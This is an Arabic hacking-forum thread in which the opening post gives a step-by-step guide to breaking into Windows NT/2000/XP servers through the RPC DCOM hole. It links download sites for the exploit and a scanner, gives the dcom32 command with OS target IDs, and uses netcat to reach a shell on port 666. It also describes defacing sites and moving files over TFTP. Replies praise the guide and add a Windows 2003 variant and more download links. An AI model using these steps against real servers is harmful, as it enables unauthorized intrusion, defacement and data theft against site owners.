ثغرة ال IIS الجديدة و الاختراقات بالجملة


ميزاتها
مشابهة كثيرا لثغرة الويب داف WEBDAV
من حيث النتيجة حيث الوصول الى
ال C:\WINNT\SYSTEM32

المواقع المصابة
WINDOWS NT 4
WINDOWS 2000 SP1 ,SP2.SP3,SP4

WINDOWS XP,WINDOWS XP SP1

تطبيقها

تعمل على اللينوكس وعلى الويندوز

===============
بالنسبة للويندوز أنت بحاجة الى ساكانر قوي
لكشف الثغرة

ممكن الحصول عليه من شركة EEYE

وهناك يمكنك ايضا استخدام السوبر سكان مع التحديث على البورتات لديه لفحص الثغرة
وممكن أيضا استخدام برنامج ال angry ip من webattak.com

المهم بعد ايجاد المواقع المصابة نتجه للتطبيق أنت الان بحاجة الى ملف الثغرة
+ برنامج ال net cat لتستطيع الوصول للشيل
ملف التطبيق + ملف فحص الثغرة + ال netcat
http://illmob.org/rpc/rpc.rar
ملف الفحص
http://illmob.org/rpc/rpcscan101.zip

نتجه الان الى كيفية العمل
الان الملف الأول ملف ال dcom32.exe

كيفية التشغيل
ندخل الى الكوماند command
وننتقل الى مكان وجود المجلد الذي يحتوي الملفات

dcom32 target_id target_ip

target_id ==
0 Windows 2000 SP0 (english)
1 Windows 2000 SP1 (english)
2 Windows 2000 SP2 (english)
3 Windows 2000 SP3 (english)
4 Windows 2000 SP4 (english)
5 Windows XP SP0 (english)
6 Windows XP SP1 (english)

وهنا عليك معرفة ماهو نظام التشغيل
ما العمل عليك بالتجريب و للسهولة يمكنك من netcraft.com
معرفة ماهو نظام التشغيل ومن ثم التجريب

target_ip ===وهو الاي بي ip للموقع المراد اختراقه

أصبح لدينا كمثال
c:\rpc\dcom32 2 192.168.0.1 هذا كمثال

الان الحطوة الثانية وهو ملف ال netcat وهو ملف ال nc.exe
nc target_ip your_port
حيث target_ip== الاي بي للموقع المراد اختراقه

your_port
هنا تضع بورت من اختيارك

يصبح المثال السابق كمايلي
nc 192.168.0.1 666
وهنا يمكن أن نضع بدل ال 666 أي منفذ نريد

الان اذا كان الموقع مصابا ستكون النتيجة مايلي

c:\winnt\system32

الان ومن هنا نستطيع التجول وتحميل ملفات والتعامل كأننا نتعامل local

الان ماذا نستطيع العمل اذا أردنا على سبيل المثال تغيير الموقع ممكن عن طؤيق ال tftp
حيث نستطيع تحميل وسحب ملفات كيفما نشاء

وهنا يمكن رفع ملف صعير حجمه لايتعدى 10 كيلو بايت لنتعامل في المستقبل من URL بحيث نستطيع تحميل الملفات واستعراضها وما الى ذلك

وأرجو ان اكون قد وفقت في هذا الشرح



لمشاركة المعلومات في الاختراق الرجاء مراسلتي
syrianhacker@hotmail.com

ولكم كل الشكر

يعجبني تفاعلك مع مواقع السيكيورتي ومع حدث اليوم وثغرة الموسم

لكن بالفعل هذي الثغرة ارعبت شركة ما يكروزفت بشكل ممتع بالنسبة لي ...

ولعلمك اشوفك ما ذكرت WINDOWS 2003 في موضوعك ؟؟ :D

ظهرت قبل يومين realese جديدة للثغرة تعمل على ويندوز 2003 بسيرفر IIS 6 طبعا

وايضا ميزة جميلة وجود برنامج سكانر رائع بمعنى الكلمة وهو RetinaRPCDCOM د
الاكسبلويت المرفق يعمل بنجاح وميزتة يعمل لك bindshell على بورت افتراضي وهو 666....

ويمكنكم تحميله من هناااا
http://www.eeye.com/html/Research/T...e=RetinaRPCDCOM



والثغرة في الملف المرفق

الصراحه الموضوع تمام

:p

تسلم حبيبي syrianhacker

موضوع ممتاز ومتألق

هاي هاكر تأكد من اللنك :p لووووول

فمان الله|4|

رااااااااائع..

وتحياتي لك..

ياسلام عليك يالهكر السوري

ومشكور على اضافتك ياهاي هكر لكن ياليت تتاكد من الوصله

وموضوع ماشاء الله قوووي:)

مشكوووووووووورين جميعا
و على فكرة الوصلة شغالة بس اخونا هاي هكر بدو يوفر عليكم تسجيل عندهم على ما اظن
http://www.eeye.com/html/Research/tools
جربو الوصلة الي فوق اختارو اسم البرنامج و لما تعملو داونلود راح يقلكم سجلو عنا يعني registration عشان تقدر تنزل الملفات المجانية مثل شركة الادوبي و الماكروميديا
اسف على الطالة بس لما تسجلو بتوصل رسالة على الايميل الي حطيتو و بيقلك كيف تدخل على الداونلوووووود
باي
الله يعطيكو العافية

ممكن وصله أخرى لأن الوصله دى مش شغاله
http://illmob.org/rpc/rpc.rar

وووصلة اخرىىىى للبرنااااامج

http://www.eEye.com/html/Products/Retina/Download.htm?id=030905.065105.078863&ver=Retina4986Demo

ادخل عليهاااا بعدين اضغط علىى Click Here To Download

ورااااااح يحمل عندك :D

بالنسبة عن البرناااااامج حجمه 17.2 مجيا بدون ضغط |4|

Bingo |4|